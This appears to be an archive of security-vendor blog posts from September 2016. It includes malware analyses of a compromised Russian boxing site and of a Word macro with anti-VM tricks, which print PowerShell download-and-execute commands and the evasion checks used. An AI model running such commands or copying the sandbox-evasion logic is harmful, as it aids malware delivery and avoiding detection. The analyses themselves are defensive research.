Monthly Archives: September 2016


Antivirus Isn’t Dead, But It’s No Panacea

Category : Check Point

It should come as no surprise that antivirus solutions on their own are not equipped to deal with many of the threats we see today. Norton Antivirus stated as much back in 2014 when it famously declared, “Antivirus is dead.” The claim was not an indication that such products would be discontinued, but rather an admission that protections need to evolve to keep up with increasingly sophisticated threats. A Norton representative asserted that traditional antivirus detected only 45% of all attacks. Even by 2014 standards, that figure seems optimistic. Today, more conservative estimates put the number somewhere between 20% and 40%.

Despite antivirus being deployed globally on virtually every endpoint, breaches are still on the rise. Detecting and preventing malicious activity remains vital, but many of the sophisticated attacks we see today can penetrate PCs despite the presence of up-to-date antivirus solutions. Antivirus’s roots go back to 1987. It is based on binary signatures, i.e., hashes used to identify specific files. Signatures have become less effective over time because modern threats constantly evolve to evade such detections.

If antivirus is no longer effective against many of today’s threats, why is it still the first line of defense for most organizations? One reason is that regulatory, governance and compliance frameworks mandate its use. Antivirus products have also evolved over time to include features such as heuristics, i.e., the ability to identify threats which have no matching signature but are similar to ones that do. Unfortunately, these have a very high false positive rate and result in bloated installations that consume unnecessary hard drive space and CPU cycles. Vendors have also built portfolios of security solutions that rely on the installation of their own antivirus product, resulting in a form of lock-in for customers.

The prevailing reliance on antivirus protection results in a number of security issues which need to be addressed. Regulatory compliance alone doesn’t guarantee a network is adequately secured. Organizations may be PCI-DSS or HIPAA compliant, yet still need to seek additional controls to mitigate any remaining gaps in the security net. Additionally, as the amount of time and resources taken up by modern antivirus scans has climbed steadily over the years, vendors now allow users to skip or postpone scans. This essentially cancels the basic protection offered by these solutions. Users have also been lulled into believing that network security is only the responsibility of specific teams within an organization. The truth is that we all have a part to play.

If organizations are serious about addressing their security gaps, a number of steps need to be taken. While malware itself is a problem, understanding how it reaches your network is equally important. Most malware is delivered by exploits, programming bugs or vulnerabilities that let an attacker take control over your machine. Preventing these exploits is key to ramping up security efficacy, as is the ability to protect against unknown threats.

First and foremost, users must be educated to never open any attachments or click a link from a source that they can’t absolutely verify. Many seemingly innocent or legitimate-appearing entities turn out not to be so innocent after all. The best protection is to not allow an attacker an “in” to your system in the first place.

Once inside your system, an attacker can use any number of freely available tools to change the hash of a file, rendering your signature-based protections ineffective. Cloud services can then allow files to be uploaded, having first confirmed if antivirus vendors still identify a file as malicious.

Obviously, solutions that look at other indicators such as behavior and traffic patterns are needed. They should lean towards preventing attacks as a first course of action, with detection supplementing those cases which manage to slip through the gaps. Such protection is needed everywhere: endpoints, mobile devices, data centers, cloud, even IoT devices and SCADA.

So how can organizations move forward and focus on what really matters? Antivirus solutions are largely commoditized; they all work more or less the same way and achieve similar results. It doesn’t make a lot of sense to incorporate modern security controls based on how well they integrate with older, less effective products. Wipe the slate clean and evaluate which solutions provide the best protection, then come back and slot antivirus into the mix. By the same token, the main focus should not be on how much installation space is required by modern solutions or even how much CPU or memory they utilize. Newer products offer far greater protection than traditional controls, and such questions do not provide an apples-to-apples comparison.

Antivirus does have its place in network security. It is a quick and efficient method of identifying known threats, thereby reducing the amount of processing required by more advanced protections. As part of a multi-layered security strategy, antivirus still makes a lot of sense. What is often needed is for organizations to break out of the mentality of “that’s how we’ve always done things”, i.e., relying solely on antivirus, and prioritize solutions that will offer the greatest protection.


Highly Evasive Code Injection Awaits User Interaction Before Delivering Malware

Category : Forcepoint

On September 27, 2016 Forcepoint Security Labs noticed that the Russian boxing site allboxing[.]ru was compromised. The site is injected with code that attempts to silently redirect users to a third party website containing an exploit and a Russian banking trojan. The injected code employs several evasion tactics, and ensures that the redirect only occurs when there is significant user interaction on the website.

Hiding in Plain Sight

The site allboxing[.]ru is a very popular Russian boxing website receiving an estimated 3 million visitors per month.

One of the scripts being used by the website at hxxp://allboxing[.]ru/misc/jquery.once.js?v=1.2 has been modified to include additional code. The code claims to be loading a jQuery plugin called “jQuery Animate Plugin v1.2” but this is in fact a fake plugin inserted by the attacker.

One of the giveaways here is that the URL reference for the plugin links to “”, whereas legitimate plugins will usually reference the project name directly, such as “”. Nevertheless, the attacker has made a significant effort to blend in with the legitimate content by using the same formatting and comment style.

The modified jquery.once.js script loads a second script from /misc/jquery.animate.js which in turn attempts to insert a script from the attacker’s own website. The script is not inserted if the user’s browser is either Chrome or Opera, presumably because the attacker is not able to exploit these browsers.

The automate.js script on getcanvas[.]org then waits for user interaction before inserting an iFrame to an exploit.

The script ensures that sufficient user interaction has occurred from either clicking, scrolling or moving the mouse. The attacker has given different weighting scores to the different types of user interaction and will only insert the iFrame once the threshold score is above 30. This is a stealth tactic used to prevent automated analysis systems from being redirected to the exploit. The technique was first documented back in 2014 in a similar infection chain.

Another stealth tactic employed here is the domain name and URL path which has been used. The term “canvas” is a well known boxing term and the URL contains the word “sport”. This makes the URL appear a lot less suspicious considering that allboxing[.]ru is a boxing news site.

Exploiting Internet Explorer

The malicious iFrame inserted by the attacker was located at hxxp://getcanvas[.]org/sport/page/5.html. The page contains a VBScript exploit that leverages CVE-2016-0189 and attempts to run a PowerShell script on the machine.

The PowerShell script decodes to the following:

(New-Object System.Net.WebClient).DownloadFile("","islzma32.exe");(New-Object -com Shell.Application).ShellExecute("islzma32.exe");

The script downloads and executes tysonfury.jpg which is a variant of the Buhtrap Russian banking trojan. The SHA1 of the sample we received is b74f71560e48488d2153ae2fb51207a0ac206e2b.

Protection Statement

Forcepoint™ customers are protected against this threat via TRITON® ACE at the following stages of attack:

  • Stage 2 (Lure) – The fake jQuery plugin is identified and blocked.
  • Stage 3 (Redirect) – The attempt to insert a malicious iFrame onto the page is blocked.
  • Stage 4 (Exploit) – The CVE-2016-0189 exploit is identified and blocked.
  • Stage 5 (Dropper) – The Buhtrap malware is prevented from being downloaded.
  • Stage 6 (Call Home) – Attempts by the Buhtrap variant to call home are identified and blocked.


Attackers are getting better at disguising the code they inject into compromised websites. Websites with high volumes of traffic are a popular choice for attackers, and this is especially true if the bulk of the traffic is from a specific region of the world of interest to the attacker. With the recent arrests of actors using the Lurk banking trojan, Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software.


Vendetta Brothers, Inc. – A Window Into the Business of the Cybercriminal Underground

Category : FireEye

FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the “Vendetta Brothers.” This enterprising duo uses various strategies to compromise point-of-sale systems, steal payment card information and sell it on their underground marketplace “Vendetta World.”

The Vendetta Brothers – who we believe operate from Spain and Eastern Europe – have been observed using everything from phishing to installing physical skimmers to steal payment card data, and their targets have mostly been located in the U.S. and Nordic countries.

Our latest report shines light on the Vendetta Brothers’ tactics, techniques and procedures, which involve the use of practices more commonly seen in legitimate business, including outsourcing, partnerships, diversifying their market, and insulating liability.

We expect to see other cybercriminal groups using these more advanced techniques as a way of scaling their operations and increasing profits, all while mitigating risk and potentially frustrating investigators.

Download the report to learn more about the Vendetta Brothers.


Your Security Systems Need to be Secure

Category : Cyber-Ark

According to a variety of industry reports, cyber security spending is measured in billions of dollars, and it is projected to grow, driven by a number of market factors including cloud, mobile, IoT and other “elements of digital business.”

But as organizations move quickly to shore up their security systems, motivated attackers continue to innovate and evolve their tactics just as rapidly. From sophisticated phishing attacks, software flaws and reverse-engineering, to protocol analysis, misuse of cryptography, side-channel attacks and even attacks on physical security measures, attackers often have little trouble getting into an organization’s network. Remember – attackers are patient – always looking for a crack to enter enterprise networks.

This is one reason why layered security is critical – ideally including proactive controls such as encryption and detection systems to identify malicious behavior. Yet security systems can be largely ineffective without privileged account security in place as a safeguard.

Think of it this way: privileged accounts are embedded within every piece of security, database and network technology – used for installation and management. As such, they represent a gateway into your organization’s most valuable assets. If you deploy a million dollars’ worth of next-gen firewalls but don’t secure their privileged accounts, an attacker can obtain those credentials and go right through your firewall. Attackers are experts in spotting “cracks,” including small vulnerabilities that only exist for a few hours. Even the smallest “crack” of one stolen credential can be enough to make your million-dollar firewall investment nearly worthless—or worse, take down your entire organization.

Today’s reality is that the IT infrastructure is not fully protected unless privileged accounts and their credentials (accessed by both humans AND applications) are secured.

To maintain the credibility and efficacy of your security solutions, put privileged account security in place before you deploy any other security controls or detection solutions. For other reasons to prioritize privileged account security today, download our new At-a-Glance Guide.


Shift Left! Accelerate continuous testing with HPE Service Virtualization

Category : Uncategorized

See how GameStop shifted left in its software application lifecycle, from development to functional and performance tests. HPE Service Virtualization speeds up continuous testing and integration by simulating the internal and/or third-party components that are needed.


Anti-VM Tricks

Category : Sentinel One

The Sample

Recently, I was tasked with investigating a malware sample which sometimes failed to behave maliciously. Unlike normal people, I spend a lot of time trying to run malware, and it can be surprisingly difficult to get it to behave like it should. Any number of things can go wrong and lead to the malware simply crashing or not doing anything at all. In this post, I’ll discuss some clever anti-VM tricks observed in a malicious Word document.

The sample’s original name is “Intelligent Software Solutions Inc.doc” and the sha256 hash is 048fc07fb94a74990d2d2b8e92c099f3f986af185c32d74c857b07f7fcce7f8e. Additional related samples can be found by searching VirusTotal for "vbaproject.bin" "activeX1.bin" type:docx.

Here’s how the document looks when opened in Word:
[Image: the document as rendered in Word]

If that didn’t look suspicious enough, here’s a view of the code:
[Image: the document’s VBA code]

This is textbook Word malware. It has no real content, includes executable code (active content), and the code is obfuscated and sketchy looking.


I first looked at the code and noticed this subroutine near the top: InkPicture1_Painted(ByVal DQkDFU As Long, ByVal KPhPosT As IInkRectangle). This looked like the entry point: it was probably executed as soon as the “Enable Content” button was clicked, and again every time the ActiveX control was rendered (i.e., painted) by Word. All it does is call IuIxpP and swallow any and all errors that are raised.

Trick #1

The IuIxpP sub calls two methods, DKTxHE and qrNjY, and raises an error if either one returns true. The first, DKTxHE, is deviously simple:

Public Function DKTxHE() As Boolean
DKTxHE = RecentFiles.Count < 3
End Function

The RecentFiles object gives access to the history of recent documents. Most users, unless they just installed Word, are going to have opened more than two documents. However, on a testing virtual machine (VM), the software is normally not “broken in”. When the VM is initially created, software is installed, maybe opened once or twice to make sure it works, and then the state is saved and every time a test needs to be made, that state is loaded again. These VM images may then be used in automated analysis and testing tools which execute malware and see how they behave. If malware can be smart enough to know when it’s being tested in a VM, it can avoid doing anything suspicious or malicious and thereby increase the time it takes to be detected by such tools.

Trick #2

The second sub, qrNjY, also tries to detect whether it is in a VM, this time by getting information about the IP address. It makes a request to , which normally requires some kind of authentication or API key. To get around this requirement, the malware makes the request look as if it is coming from the site itself by setting the HTTP Referer header to and the User-Agent to Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0). This bypass only allows one to retrieve information about the requesting address, which has limited uses.

The response is in JSON and contains information such as the country, city, and, most importantly, the organization associated with the IP address. For example:

{
  "location": {
    "latitude": 30.7858,
    "longitude": -102.1232,
    "metro_code": 705,
    "accuracy_radius": 5,
    "time_zone": "America/Los_Angeles"
  },
  "continent": {
    "names": {
      "ja": "北アメリカ",
      "pt-BR": "América do Norte",
      "de": "Nordamerika",
      "es": "Norteamérica",
      "ru": "Северная Америка",
      "fr": "Amérique du Nord",
      "zh-CN": "北美洲",
      "en": "North America"
    },
    "code": "NA",
    "geoname_id": 6255149
  },
  "city": {
    "names": {
      "pt-BR": "Oakland",
      "de": "Oakland",
      "es": "Oakland",
      "ja": "オークランド",
      "en": "Oakland",
      "ru": "Окленд",
      "fr": "Oakland",
      "zh-CN": "奥克兰"
    },
    "geoname_id": 5378538
  },
  "postal": {
    "code": "94619"
  },
  "country": {
    "names": {
      "ru": "США",
      "fr": "États-Unis",
      "zh-CN": "美国",
      "en": "United States",
      "ja": "アメリカ合衆国",
      "es": "Estados Unidos",
      "pt-BR": "Estados Unidos",
      "de": "USA"
    },
    "iso_code": "US",
    "geoname_id": 6252001
  },
  "traits": {
    "organization": "Comcast Cable",
    "isp": "Comcast Cable",
    "ip_address": "",
    "autonomous_system_organization": "Comcast Cable Communications, LLC",
    "domain": "",
    "autonomous_system_number": 7922
  },
  "registered_country": {
    "geoname_id": 6252001,
    "names": {
      "zh-CN": "美国",
      "ru": "США",
      "fr": "États-Unis",
      "en": "United States",
      "ja": "アメリカ合衆国",
      "pt-BR": "Estados Unidos",
      "de": "USA",
      "es": "Estados Unidos"
    },
    "iso_code": "US"
  },
  "subdivisions": [
    {
      "geoname_id": 5332921,
      "names": {
        "ru": "Калифорния",
        "fr": "Californie",
        "zh-CN": "加利福尼亚州",
        "en": "California",
        "ja": "カリフォルニア州",
        "pt-BR": "Califórnia",
        "es": "California",
        "de": "Kalifornien"
      },
      "iso_code": "CA"
    }
  ]
}

In the example response, it is clear the IP address is associated with Comcast. After this request is made, several strings are decrypted and stored in an array. If any of the strings in the array are found in the JSON response, the code throws an error and execution stops. Everything is converted to uppercase before any comparison is made. The list of strings in the array, with fixed capitalization and sorted alphabetically:

Blue Coat
Data Center
ESET, Spol
Iron Port
Ovh Sas
Palo Alto
Strong Technologies
Trend Micro

Once this list was obtained, it was clear that the purpose of this sub is to check whether the IP address is associated with any hosting or anti-virus company which is likely to be hosting testing VMs.

After taking apart and understanding the two anti-sandbox / anti-VM subroutines, I had a pretty good idea why we sometimes failed to detect this particular sample. To test my hypothesis, I created an empty Word document and copied it twice to produce three documents with different names. Then, I opened each one and closed Word in order to populate the recent documents history. Finally, I opened the malware in question, enabled active content, and was immediately greeted with a satisfying “Threat Detected” popup and the near-immediate termination of the malicious document. If I opened the malware without first creating a history of recent documents, the malware would fail to do anything malicious at all. Because it did not actually do anything bad, it was not detected.
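To check whether an analysis VM would be fingerprinted by the two tricks above, here is an added Python example (not from the original post or the sample) that reproduces the RecentFiles threshold and the uppercase substring comparison over the decrypted string list, run against a constructed, abbreviated copy of the geo-IP JSON shown above. The function names and the abbreviated JSON are assumptions.

```python
import json

# Constructed, abbreviated version of the geo-IP response shown in the post.
# Only the fields the marker list could plausibly match are kept.
SAMPLE_RESPONSE = json.dumps({
    "city": {"names": {"en": "Oakland"}},
    "country": {"iso_code": "US", "names": {"en": "United States"}},
    "traits": {
        "organization": "Comcast Cable",
        "isp": "Comcast Cable",
        "autonomous_system_organization": "Comcast Cable Communications, LLC",
        "autonomous_system_number": 7922,
    },
})

# The decrypted strings recovered from the qrNjY sub, as listed in the post.
VENDOR_MARKERS = [
    "Blue Coat", "Data Center", "ESET, Spol", "Iron Port",
    "Ovh Sas", "Palo Alto", "Strong Technologies", "Trend Micro",
]

# DKTxHE: RecentFiles.Count < 3 is treated as "this is a test VM".
RECENT_FILES_THRESHOLD = 3


def markers_in_response(raw_json: str, markers=VENDOR_MARKERS) -> list:
    """Reproduce the macro's comparison: the whole response body and every
    marker are uppercased, and a marker counts as found if it appears
    anywhere in the body as a substring. Returns the markers that matched."""
    body = raw_json.upper()
    return [m for m in markers if m.upper() in body]


def trick1_flags_vm(recent_files_count: int) -> bool:
    """Trick #1: too few recent documents means the macro bails out."""
    return recent_files_count < RECENT_FILES_THRESHOLD


def trick2_flags_vm(raw_json: str) -> bool:
    """Trick #2: any vendor/hosting marker in the geo-IP response means bail out."""
    return bool(markers_in_response(raw_json))


def sandbox_readiness(recent_files_count: int, geoip_json: str) -> dict:
    """Defender-side summary: would this analysis VM make the sample go quiet?
    `recent_files_count` is what Word's RecentFiles.Count would report and
    `geoip_json` is the response the VM's egress IP would produce."""
    matched = markers_in_response(geoip_json)
    recent_ok = not trick1_flags_vm(recent_files_count)
    return {
        "recent_files_ok": recent_ok,
        "egress_ip_ok": not matched,
        "matched_markers": matched,
        "malware_would_run": recent_ok and not matched,
    }


if __name__ == "__main__":
    # A fresh VM image (no recent documents) behind a residential ISP.
    print(sandbox_readiness(0, SAMPLE_RESPONSE))
    # The same image after opening three documents, as done in the post.
    print(sandbox_readiness(3, SAMPLE_RESPONSE))
    # A "broken in" image whose egress IP belongs to a security vendor (constructed).
    vendor_egress = SAMPLE_RESPONSE.replace(
        "Comcast Cable Communications, LLC", "TREND MICRO INCORPORATED")
    print(sandbox_readiness(3, vendor_egress))
```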

The Payload

Still somewhat curious about what the payload could be, I continued taking apart the sample to find that it executes some PowerShell:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://payload_site/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)

This script downloads http://payload_site/admin/worddata.dat, which turned out to be a low-level key logger. The sha256 hash for worddata.dat is 19d884d3b688abf8e284d3bc6a06817096d15592bcd73f85a0e4b79749f2a744.


Related Works

Very closely related anti-VM / anti-sandbox techniques have been discussed by researchers at Proofpoint and by Deepen Desai at Zscaler. Since these methods are appearing in different malware families, they seem to represent a new trend for VBA-based malware.


Testing malware is hard and there is a lot that can go wrong, especially if you do not rely merely on simple signatures but instead detect malicious behavior. For a fair evaluation of an AV product, any test must be done in such a way as to exercise the most malicious code and invoke realistic behaviors from the malware samples. This means selecting malware which is still “alive”, i.e., has command and control servers which are still up and functioning, as well as configuring the test VM to resemble an actual user’s machine as closely as possible. Both conditions are achievable, but it is easy to stuff a test set with samples which are either not valid executables or do not behave maliciously, and many tests are performed on freshly minted VM images with no user activity history, running in the cloud, where they can be detected by interrogating IP address information. Selecting good samples and creating good VM images is possible, but it takes extra effort.

Not only does this sort of lazy evaluation skew detection results, but the skew is unrealistic. Signatures can easily detect executables that do not run and cannot behave maliciously, but is that really what is threatening your users? Real threats are the ones no one has seen yet, or are so new that signatures have not been created. A fair test must necessarily include current and functional samples executed in a realistic environment.


Prioritizing Application Optimization Efforts Based on Business Impact

Category : Riverbed

SteelCentral AppInternals provides a revolutionary way of prioritizing optimization efforts based on the business impact to your mission-critical applications.

Tuning without understanding the business impact is a lot like playing Whack-a-Mole. Traditional application tuning efforts often involve identifying the slowest code or SQL, optimizing that, identifying the next slowest code or SQL, optimizing that, and so on, and so on, and so on…, but without knowing the impact to the business, do you know that your efforts are the most impactful they could be? Are your efforts making a difference to your end users?

AppInternals’ Performance Graph presents performance data in a new way by showing logical relationships between transaction types and their associated sub-components. Performance Graph easily and visually shows component delay for every transaction type. In the graph below, we see the objects associated with each transaction type and quickly see where the application is spending its time. In this case, where we are not accounting for business impact, we might start our optimization efforts with the DX.EntryPoint.Main method.

If we weight the transaction types based on their importance to the business, our focus changes. In this example, we are working with a transportation application. Dispatching trucks is the most important function. If trucks do not roll, the company does not make money. Invoicing on the other hand, is important, but not as critical as dispatching trucks. If we assign a financial value to each transaction type, or a relative weight if we do not know the actual financial impact, our tuning focus changes.

After applying weights, we see without a doubt that the TMWSystems…DoWork method is the most time-consuming method based on what is most important to the application (i.e., dispatching trucks). Tuning this will have a direct impact on critical application performance.


Prepare your SOC for the Convergence of Advanced Threat Management and SIEM

Category : McAfee

Earn 1 CPE Credit for attending this live webcast

Wednesday, October 12, 2016
11:00am PT | 1:00pm CT | 2:00pm ET

Is your SOC prepared for this next-generation of security operations?

Learn from renowned cybersecurity expert Peter Stephenson and Michael Leland, SIEM Evangelist from Intel Security, as they discuss why enterprises are now turning to advanced threat and incident management (ATIM) TTPs that integrate with their SIEM.

This continued shift from perimeter-focused, reactive approaches—to continuously monitored, collaborative and proactive methods, leverages analytics and crowdsourced threat feeds, and requires as much focus on the context as the incident.

Key takeaways will include:

  • Use of shared technical data to automate out the noise and focus on the signal.
  • How to define the effects of each step in the attack chain to apply effective defenses and respond quickly.
  • Integrating technical data context and organizational data for enhanced understanding of what is happening in the environment.



Become a Risk Ninja

Category : HP Security

Master intelligent, adaptive security by attending an HPE Transformation Workshop. Led by HPE security experts, this is an all-day, in-depth workshop designed for enterprise IT decision makers.

Thank you for your interest in the Protect Your Digital Enterprise Transformation Workshop. You and your team will spend the day with Hewlett Packard Enterprise experts, exchange information on your most pressing business issues, and receive a customized roadmap to help you plan a robust security transformation journey that supports your business goals.




Gigamon and Splunk: Using Metadata to Improve Security Visibility

Category : Gigamon

Gigamon is looking forward to an exciting week at Splunk’s developers conference, .conf16: The 7th Annual Splunk Conference. For us, it’s all about the power of metadata to achieve actionable visibility so organizations can get better performance and intelligence from their security solutions.

Establishing reliable baselines and context for network activity is a daunting task. There are simply too many data sources belonging to too many different tools and solutions: endpoints, routers, switches, application servers (like DNS and Active Directory), existing security systems (like firewalls and intrusion prevention systems), and the list goes on. Even if it were possible to gather all the necessary data, there is simply too much of it to store and analyze easily. To make matters worse, turning on logging on systems like firewalls and application servers is computationally intensive.

How can organizations get access to the data that is so critical to proactive monitoring, detection and response efforts? And once they get it, how can they reduce the immense data volumes? To avoid overwhelming the monitoring infrastructure, the answer lies in retrieving a summary of relevant data using metadata elements found in Splunk® Enterprise with GigaSECURE Metadata Engine.

Sitting inside the GigaSECURE Security Delivery Platform is a full-blown Metadata Engine that provides useful security information about applications, devices, and users’ behaviors for each and every security tool connected to it. To solve the data deluge problem (which will only be exacerbated when speeds increase to 100G), organizations can simply turn on this function, feed the metadata into Splunk Enterprise, and gain greater understanding using the following capabilities.


[Image: Splunk Enterprise dashboard screen]

Using the Gigamon Metadata Engine, organizations have deeper SSL visibility. They can analyze all SSL certificates used in the organization, identify the issuing certificate authority and Web servers, and see additional details including expired certificates, self-signed certificates, and more. They can also detect suspicious certificates, their related servers tied to malicious sites, and which endpoints have visited those sites.


Organizations can also conduct DNS queries to see if an impacted device gained access to command and control functions. With the Metadata Engine, they can see the top DNS queries and responses, gain visibility into less commonly accessed DNS domain names, and cross-reference their reputation. For example, they might find a set of hosts beaconing to their command and control server at regular intervals. Using Splunk Enterprise’s scripting language, they can programmatically search for such hosts at scheduled intervals and find compromised endpoints for further investigation and analysis.


Another capability involves monitoring URLs and response codes. The Metadata Engine can parse URLs out of HTTP streams and pass them to Splunk Enterprise. Analysts can perform a host of security checks, starting with reputation analysis of URLs to see which webpages employees have visited, whether for work-related or personal use. They can determine which website breached their network, gained access, and spread laterally.

Metadata analysis also detects irregularities by parsing response codes and looking for deviations from the normal (baseline) on a regular basis. An excessive increase in redirect codes such as the popular “302 redirect” may indicate a compromise of the organization’s servers, with the attacker directing traffic to an alternate server. A sudden increase in error codes such as “404 Page not found” may show a possible denial of service attack where the threat actor has caused the organization’s Web servers to be unreachable by browsers attempting to connect to them.
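The baseline-deviation check described above, as an added Python example that is not Gigamon’s or Splunk’s code: it parses constructed HTTP metadata records (timestamp, method, URL, status), learns per-minute 302 and 404 rates from quiet baseline minutes, and flags later minutes whose rate exceeds the baseline mean by more than three standard deviations or by an absolute floor of ten percentage points. The record format, thresholds and the quiet/burst minutes are assumptions.

```python
from collections import Counter, defaultdict
from statistics import mean, pstdev

# Constructed HTTP metadata records in the form "<timestamp> <method> <url> <status>".
# Minutes 0-5 are a quiet baseline; minute 6 carries a burst of 302 redirects and
# minute 7 a burst of 404s; minute 8 is quiet again.
def constructed_records():
    counts = {}
    for m in range(6):                      # baseline: ~5% 302s, ~3.5% 404s
        c302, c404 = 4 + m % 3, 3 + m % 2
        counts[m] = {200: 100 - c302 - c404, 302: c302, 404: c404}
    counts[6] = {200: 56, 302: 40, 404: 4}  # redirect burst
    counts[7] = {200: 50, 302: 5, 404: 45}  # 404 burst
    counts[8] = {200: 92, 302: 5, 404: 3}   # quiet
    lines = []
    for minute, per_code in counts.items():
        for code, n in per_code.items():
            for i in range(n):
                lines.append(f"2016-09-27T10:{minute:02d}:00 GET /page/{i} {code}")
    return lines


def parse_record(line):
    """Return (minute bucket, url, status code) from one metadata record."""
    ts, _method, url, status = line.split()
    return int(ts[14:16]), url, int(status)


def code_rates(lines):
    """Per minute bucket, the fraction of responses carrying each status code."""
    per_bucket = defaultdict(Counter)
    for line in lines:
        bucket, _url, status = parse_record(line)
        per_bucket[bucket][status] += 1
    rates = {}
    for bucket, counts in per_bucket.items():
        total = sum(counts.values())
        rates[bucket] = {code: n / total for code, n in counts.items()}
    return rates


def flag_deviations(lines, baseline_buckets, watch_codes=(302, 404),
                    sigma=3.0, min_delta=0.10):
    """Flag (bucket, code, observed_rate, baseline_mean) where a watched code's
    rate exceeds baseline mean + max(sigma * stdev, min_delta). The absolute
    floor keeps a near-constant baseline from alerting on tiny fluctuations."""
    rates = code_rates(lines)
    alerts = []
    for code in watch_codes:
        base = [rates[b].get(code, 0.0) for b in baseline_buckets if b in rates]
        mu, sd = mean(base), pstdev(base)
        threshold = mu + max(sigma * sd, min_delta)
        for bucket in sorted(rates):
            if bucket in baseline_buckets:
                continue
            observed = rates[bucket].get(code, 0.0)
            if observed > threshold:
                alerts.append((bucket, code, round(observed, 3), round(mu, 3)))
    return alerts


if __name__ == "__main__":
    for alert in flag_deviations(constructed_records(), baseline_buckets=range(6)):
        bucket, code, observed, base = alert
        print(f"minute {bucket}: {code} rate {observed:.0%} vs baseline {base:.1%}")
```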


Many organizations already use Splunk software to centrally collect event and log data across their infrastructure. By integrating GigaSECURE Metadata Engine in combination with Splunk Enterprise, security organizations can leverage the rich metadata for improved threat analysis and intelligence.

Stop by our Gigamon booth # M12 at Splunk’s .conf2016 to learn more and read our recent white papers, Harnessing the Power of Metadata for Security and Nine Metadata Use Cases: How to Use Metadata to Make Data-Driven Decisions.
